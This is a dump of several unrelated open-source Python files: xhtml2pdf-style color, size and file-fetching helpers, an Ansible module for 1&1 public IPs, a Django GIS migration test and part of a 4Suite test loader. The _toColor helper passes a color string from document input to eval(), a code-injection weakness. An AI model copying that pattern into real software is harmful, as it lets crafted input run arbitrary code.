return list(value)
def flatten(x):
"""flatten(sequence) -> list
copied from http://kogs-www.informatik.uni-hamburg.de/~meine/python_tricks
Returns a single, flat list which contains all elements retrieved
from the sequence and all recursively contained sub-sequences
(iterables).
Examples:
>>> [1, 2, [3,4], (5,6)]
[1, 2, [3, 4], (5, 6)]
>>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])
[1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]"""
result = []
for el in x:
#if isinstance(el, (list, tuple)):
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def _toColor(arg, default=None):
'''try to map an arbitrary arg to a color instance'''
if isinstance(arg, Color): return arg
tArg = type(arg)
if tArg in (types.ListType, types.TupleType):
assert 3 <= len(arg) <= 4, 'Can only convert 3 and 4 sequences to color'
assert 0 <= min(arg) and max(arg) <= 1
return len(arg) == 3 and Color(arg[0], arg[1], arg[2]) or CMYKColor(arg[0], arg[1], arg[2], arg[3])
elif tArg == types.StringType:
C = getAllNamedColors()
s = arg.lower()
if C.has_key(s): return C[s]
try:
return toColor(eval(arg))
except:
pass
try:
return HexColor(arg)
except:
if default is None:
raise ValueError('Invalid color value %r' % arg)
return default
def getColor(value, default=None):
" Convert to color value "
try:
original = value
if isinstance(value, Color):
return value
value = str(value).strip().lower()
if value == "transparent" or value == "none":
return default
if value in COLOR_BY_NAME:
return COLOR_BY_NAME[value]
if value.startswith("#") and len(value) == 4:
value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
elif rgb_re.search(value):
# e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
r, g, b = [int(x) for x in rgb_re.search(value).groups()]
value = "#%02x%02x%02x" % (r, g, b)
else:
# Shrug
pass
# XXX Throws illegal in 2.1 e.g. toColor('none'),
# therefore we have a workaround here
return _toColor(value)
except ValueError, e:
log.warn("Unknown color %r", original)
return default
def getBorderStyle(value, default=None):
# log.debug(value)
if value and (str(value).lower() not in ("none", "hidden")):
return value
return default
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
#"xx-small" : 3./5.,
#"x-small": 3./4.,
#"small": 8./9.,
#"medium": 1./1.,
#"large": 6./5.,
#"x-large": 3./2.,
#"xx-large": 2./1.,
#"xxx-large": 3./1.,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
def getSize(value, relative=0, base=None, default=0.0):
"""
Converts strings to standard sizes
"""
try:
original = value
if value is None:
return relative
elif type(value) is types.FloatType:
return value
elif type(value) is types.IntType:
return float(value)
elif type(value) in (types.TupleType, types.ListType):
value = "".join(value)
value = str(value).strip().lower().replace(",", ".")
if value[ - 2:] == 'cm':
return float(value[: - 2].strip()) * cm
elif value[ - 2:] == 'mm':
return (float(value[: - 2].strip()) * mm) # 1mm = 0.1cm
elif value[ - 2:] == 'in':
return float(value[: - 2].strip()) * inch # 1pt == 1/72inch
elif value[ - 2:] == 'inch':
return float(value[: - 4].strip()) * inch # 1pt == 1/72inch
elif value[ - 2:] == 'pt':
return float(value[: - 2].strip())
elif value[ - 2:] == 'pc':
return float(value[: - 2].strip()) * 12.0 # 1pc == 12pt
elif value[ - 2:] == 'px':
return float(value[: - 2].strip()) * dpi96 # XXX W3C says, use 96pdi http://www.w3.org/TR/CSS21/syndata.html#length-units
elif value[ - 1:] == 'i': # 1pt == 1/72inch
return float(value[: - 1].strip()) * inch
elif value in ("none", "0", "auto"):
return 0.0
elif relative:
if value[ - 2:] == 'em': # XXX
return (float(value[: - 2].strip()) * relative) # 1em = 1 * fontSize
elif value[ - 2:] == 'ex': # XXX
return (float(value[: - 2].strip()) * (relative / 2.0)) # 1ex = 1/2 fontSize
elif value[ - 1:] == '%':
# print "%", value, relative, (relative * float(value[:-1].strip())) / 100.0
return (relative * float(value[: - 1].strip())) / 100.0 # 1% = (fontSize * 1) / 100
elif value in ("normal", "inherit"):
return relative
elif _relativeSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
elif _absoluteSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
try:
value = float(value)
except:
log.warn("getSize: Not a float %r", value)
return default #value = 0
return max(0, value)
except Exception:
log.warn("getSize %r %r", original, relative, exc_info=1)
# print "ERROR getSize", repr(value), repr(value), e
return default
def getCoords(x, y, w, h, pagesize):
"""
As a stupid programmer I like to use the upper left
corner of the document as the 0,0 coords therefore
we need to do some fancy calculations
"""
#~ print pagesize
ax, ay = pagesize
if x < 0:
x = ax + x
if y < 0:
y = ay + y
if w != None and h != None:
if w <= 0:
w = (ax - x + w)
if h <= 0:
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
The last to values with negative values are interpreted as offsets form
the right and lower border.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = map(getSize, box)
return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = map(getSize, position)
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
#if hasattr(buffer, "read"):
#shutil.copyfileobj( fsrc, fdst[, length])
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEnginge etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
def makeTempFile(self):
" Switch to next startegy. If an error occured stay with the first strategy "
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
" Get a named temporary file "
self.makeTempFile()
return self.name
def fileno(self):
"""Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
" Get value of file. Work around for second strategy "
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
" If capacity != -1 and length of file > capacity it is time to switch "
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = str(uri)
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
# Drive letters have len==1 but we are looking for things like http:
if len(urlParts[0]) > 1 :
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
# data = r1.read()
self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
# zbuf = cStringIO.StringIO(data)
import gzip
self.file = gzip.GzipFile(mode="rb", fileobj=r1)
#data = zfile.read()
#zfile.close()
else:
self.file = r1
# self.file = urlResponse
else:
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_file = tempfile.NamedTemporaryFile()
if self.file:
shutil.copyfileobj(self.file, self.tmp_file)
else:
self.tmp_file.write(self.getData())
self.tmp_file.flush()
return self.tmp_file.name
def getData(self):
if self.data is not None:
return self.data
if self.file is not None:
self.data = self.file.read()
return self.data
return None
def notFound(self):
return (self.file is None) and (self.data is None)
def setMimeTypeByName(self, name):
" Guess the mime type "
mimetype = mimetypes.guess_type(name)[0]
if mimetype is not None:
self.mimetype = mimetypes.guess_type(name)[0].split(";")[0]
def getFile(*a , **kw):
file = pisaFileObject(*a, **kw)
if file.notFound():
return None
return file
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)}
| apache-2.0 |
sorenk/ansible | lib/ansible/modules/cloud/oneandone/oneandone_public_ip.py | 14 | 10224 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: oneandone_public_ip
short_description: Configure 1&1 public IPs.
description:
- Create, update, and remove public IPs.
This module has a dependency on 1and1 >= 1.0
version_added: "2.5"
options:
state:
description:
- Define a public ip state to create, remove, or update.
required: false
default: 'present'
choices: [ "present", "absent", "update" ]
auth_token:
description:
- Authenticating API token provided by 1&1.
required: true
api_url:
description:
- Custom API URL. Overrides the
ONEANDONE_API_URL environement variable.
required: false
reverse_dns:
description:
- Reverse DNS name. maxLength=256
required: false
datacenter:
description:
- ID of the datacenter where the IP will be created (only for unassigned IPs).
required: false
type:
description:
- Type of IP. Currently, only IPV4 is available.
choices: ["IPV4", "IPV6"]
default: 'IPV4'
required: false
public_ip_id:
description:
- The ID of the public IP used with update and delete states.
required: true
wait:
description:
- wait for the instance to be in state 'running' before returning
required: false
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
wait_interval:
description:
- Defines the number of seconds to wait when using the _wait_for methods
default: 5
requirements:
- "1and1"
- "python >= 2.6"
author:
- Amel Ajdinovic (@aajdinov)
- Ethan Devenport (@edevenport)
'''
EXAMPLES = '''
# Create a public IP.
- oneandone_public_ip:
auth_token: oneandone_private_api_key
reverse_dns: example.com
datacenter: US
type: IPV4
# Update a public IP.
- oneandone_public_ip:
auth_token: oneandone_private_api_key
public_ip_id: public ip id
reverse_dns: secondexample.com
state: update
# Delete a public IP
- oneandone_public_ip:
auth_token: oneandone_private_api_key
public_ip_id: public ip id
state: absent
'''
RETURN = '''
public_ip:
description: Information about the public ip that was processed
type: dict
sample: '{"id": "F77CC589EBC120905B4F4719217BFF6D", "ip": "10.5.132.106"}'
returned: always
'''
import os
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.oneandone import (
get_datacenter,
get_public_ip,
OneAndOneResources,
wait_for_resource_creation_completion
)
HAS_ONEANDONE_SDK = True
try:
import oneandone.client
except ImportError:
HAS_ONEANDONE_SDK = False
DATACENTERS = ['US', 'ES', 'DE', 'GB']
TYPES = ['IPV4', 'IPV6']
def _check_mode(module, result):
if module.check_mode:
module.exit_json(
changed=result
)
def create_public_ip(module, oneandone_conn):
"""
Create new public IP
module : AnsibleModule object
oneandone_conn: authenticated oneandone object
Returns a dictionary containing a 'changed' attribute indicating whether
any public IP was added.
"""
reverse_dns = module.params.get('reverse_dns')
datacenter = module.params.get('datacenter')
ip_type = module.params.get('type')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
wait_interval = module.params.get('wait_interval')
if datacenter is not None:
datacenter_id = get_datacenter(oneandone_conn, datacenter)
if datacenter_id is None:
_check_mode(module, False)
module.fail_json(
msg='datacenter %s not found.' % datacenter)
try:
_check_mode(module, True)
public_ip = oneandone_conn.create_public_ip(
reverse_dns=reverse_dns,
ip_type=ip_type,
datacenter_id=datacenter_id)
if wait:
wait_for_resource_creation_completion(oneandone_conn,
OneAndOneResources.public_ip,
public_ip['id'],
wait_timeout,
wait_interval)
public_ip = oneandone_conn.get_public_ip(public_ip['id'])
changed = True if public_ip else False
return (changed, public_ip)
except Exception as e:
module.fail_json(msg=str(e))
def update_public_ip(module, oneandone_conn):
"""
Update a public IP
module : AnsibleModule object
oneandone_conn: authenticated oneandone object
Returns a dictionary containing a 'changed' attribute indicating whether
any public IP was changed.
"""
reverse_dns = module.params.get('reverse_dns')
public_ip_id = module.params.get('public_ip_id')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
wait_interval = module.params.get('wait_interval')
public_ip = get_public_ip(oneandone_conn, public_ip_id, True)
if public_ip is None:
_check_mode(module, False)
module.fail_json(
msg='public IP %s not found.' % public_ip_id)
try:
_check_mode(module, True)
public_ip = oneandone_conn.modify_public_ip(
ip_id=public_ip['id'],
reverse_dns=reverse_dns)
if wait:
wait_for_resource_creation_completion(oneandone_conn,
OneAndOneResources.public_ip,
public_ip['id'],
wait_timeout,
wait_interval)
public_ip = oneandone_conn.get_public_ip(public_ip['id'])
changed = True if public_ip else False
return (changed, public_ip)
except Exception as e:
module.fail_json(msg=str(e))
def delete_public_ip(module, oneandone_conn):
"""
Delete a public IP
module : AnsibleModule object
oneandone_conn: authenticated oneandone object
Returns a dictionary containing a 'changed' attribute indicating whether
any public IP was deleted.
"""
public_ip_id = module.params.get('public_ip_id')
public_ip = get_public_ip(oneandone_conn, public_ip_id, True)
if public_ip is None:
_check_mode(module, False)
module.fail_json(
msg='public IP %s not found.' % public_ip_id)
try:
_check_mode(module, True)
deleted_public_ip = oneandone_conn.delete_public_ip(
ip_id=public_ip['id'])
changed = True if deleted_public_ip else False
return (changed, {
'id': public_ip['id']
})
except Exception as e:
module.fail_json(msg=str(e))
def main():
module = AnsibleModule(
argument_spec=dict(
auth_token=dict(
type='str',
default=os.environ.get('ONEANDONE_AUTH_TOKEN')),
api_url=dict(
type='str',
default=os.environ.get('ONEANDONE_API_URL')),
public_ip_id=dict(type='str'),
reverse_dns=dict(type='str'),
datacenter=dict(
choices=DATACENTERS,
default='US'),
type=dict(
choices=TYPES,
default='IPV4'),
wait=dict(type='bool', default=True),
wait_timeout=dict(type='int', default=600),
wait_interval=dict(type='int', default=5),
state=dict(type='str', default='present', choices=['present', 'absent', 'update']),
),
supports_check_mode=True
)
if not HAS_ONEANDONE_SDK:
module.fail_json(msg='1and1 required for this module')
if not module.params.get('auth_token'):
module.fail_json(
msg='auth_token parameter is required.')
if not module.params.get('api_url'):
oneandone_conn = oneandone.client.OneAndOneService(
api_token=module.params.get('auth_token'))
else:
oneandone_conn = oneandone.client.OneAndOneService(
api_token=module.params.get('auth_token'), api_url=module.params.get('api_url'))
state = module.params.get('state')
if state == 'absent':
if not module.params.get('public_ip_id'):
module.fail_json(
msg="'public_ip_id' parameter is required to delete a public ip.")
try:
(changed, public_ip) = delete_public_ip(module, oneandone_conn)
except Exception as e:
module.fail_json(msg=str(e))
elif state == 'update':
if not module.params.get('public_ip_id'):
module.fail_json(
msg="'public_ip_id' parameter is required to update a public ip.")
try:
(changed, public_ip) = update_public_ip(module, oneandone_conn)
except Exception as e:
module.fail_json(msg=str(e))
elif state == 'present':
try:
(changed, public_ip) = create_public_ip(module, oneandone_conn)
except Exception as e:
module.fail_json(msg=str(e))
module.exit_json(changed=changed, public_ip=public_ip)
if __name__ == '__main__':
main()
| gpl-3.0 |
Batterfii/django | tests/gis_tests/gis_migrations/test_commands.py | 276 | 2723 | from __future__ import unicode_literals
from django.core.management import call_command
from django.db import connection
from django.test import TransactionTestCase, skipUnlessDBFeature
@skipUnlessDBFeature("gis_enabled")
class MigrateTests(TransactionTestCase):
"""
Tests running the migrate command in Geodjango.
"""
available_apps = ["gis_tests.gis_migrations"]
def get_table_description(self, table):
with connection.cursor() as cursor:
return connection.introspection.get_table_description(cursor, table)
def assertTableExists(self, table):
with connection.cursor() as cursor:
self.assertIn(table, connection.introspection.table_names(cursor))
def assertTableNotExists(self, table):
with connection.cursor() as cursor:
self.assertNotIn(table, connection.introspection.table_names(cursor))
def test_migrate_gis(self):
"""
Tests basic usage of the migrate command when a model uses Geodjango
fields. Regression test for ticket #22001:
https://code.djangoproject.com/ticket/22001
It's also used to showcase an error in migrations where spatialite is
enabled and geo tables are renamed resulting in unique constraint
failure on geometry_columns. Regression for ticket #23030:
https://code.djangoproject.com/ticket/23030
"""
# Make sure the right tables exist
self.assertTableExists("gis_migrations_neighborhood")
self.assertTableExists("gis_migrations_household")
self.assertTableExists("gis_migrations_family")
if connection.features.supports_raster:
self.assertTableExists("gis_migrations_heatmap")
# Unmigrate everything
call_command("migrate", "gis_migrations", "zero", verbosity=0)
# Make sure it's all gone
self.assertTableNotExists("gis_migrations_neighborhood")
self.assertTableNotExists("gis_migrations_household")
self.assertTableNotExists("gis_migrations_family")
if connection.features.supports_raster:
self.assertTableNotExists("gis_migrations_heatmap")
# Even geometry columns metadata
try:
GeoColumn = connection.ops.geometry_columns()
except NotImplementedError:
# Not all GIS backends have geometry columns model
pass
else:
self.assertEqual(
GeoColumn.objects.filter(
**{'%s__in' % GeoColumn.table_name_col(): ["gis_neighborhood", "gis_household"]}
).count(),
0)
# Revert the "unmigration"
call_command("migrate", "gis_migrations", verbosity=0)
| bsd-3-clause |
Pikecillo/genna | external/4Suite-XML-1.0.2/Ft/Lib/TestSuite/TestModule.py | 1 | 6155 | ########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Lib/TestSuite/TestModule.py,v 1.9 2006/08/11 15:50:12 jkloth Exp $
"""
Provides the TestModule class for wrapping modules/packages.
Copyright 2006 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
import os
from Ft.Lib import ImportUtil
import TestLoader, TestFunction, TestMode, TestCoverage
class TestModule(TestLoader.TestLoader):
"""Test object for a module or package."""
def __init__(self, name, module, addModes, skipModes, allModes):
TestLoader.TestLoader.__init__(self, name, module.__name__, addModes,
skipModes, allModes)
self.module = module
self.modes = self.getModes(addModes, skipModes, allModes)
loader = ImportUtil.FindLoader(self.path)
self.isPackage = loader.is_package(self.path)
return
def getModes(self, addModes, skipModes, allModes):
# Create the list of modes we will run
modes = getattr(self.module, 'MODES', [TestMode.DefaultMode()])
run_modes = []
if allModes:
# Use whatever modes are not skipped
for mode in modes:
if mode.name not in skipModes:
run_modes.append(mode)
else:
# Use the specified modes that are not also skipped
for mode in modes:
if mode.name in addModes and mode.name not in skipModes:
run_modes.append(mode)
# If no specified modes found, use the default
if not run_modes:
for mode in modes:
if mode.default and mode.name not in skipModes:
run_modes.append(mode)
return run_modes
def getTests(self):
"""
Get the test objects contained within this module.
"""
# If there are no cached results, gather the sub-tests based on
# the type of module.
if not self.tests:
# Get the test function(s) defined in this module
for name in dir(self.module):
if name == 'Test': #name.startswith('Test'):
obj = getattr(self.module, name)
if callable(obj):
self.tests.append(TestFunction.TestFunction(obj))
# If this is a package, get the available modules
if self.isPackage:
files = []
dirs = []
path = ImportUtil.GetSearchPath(self.path)
for importer, name, ispkg in ImportUtil.IterModules(path):
if ispkg:
dirs.append(name)
else:
files.append(name)
# Default running order is alphabetical
dirs.sort()
files.sort()
# Let the module manipulate the test lists
if hasattr(self.module, 'PreprocessFiles'):
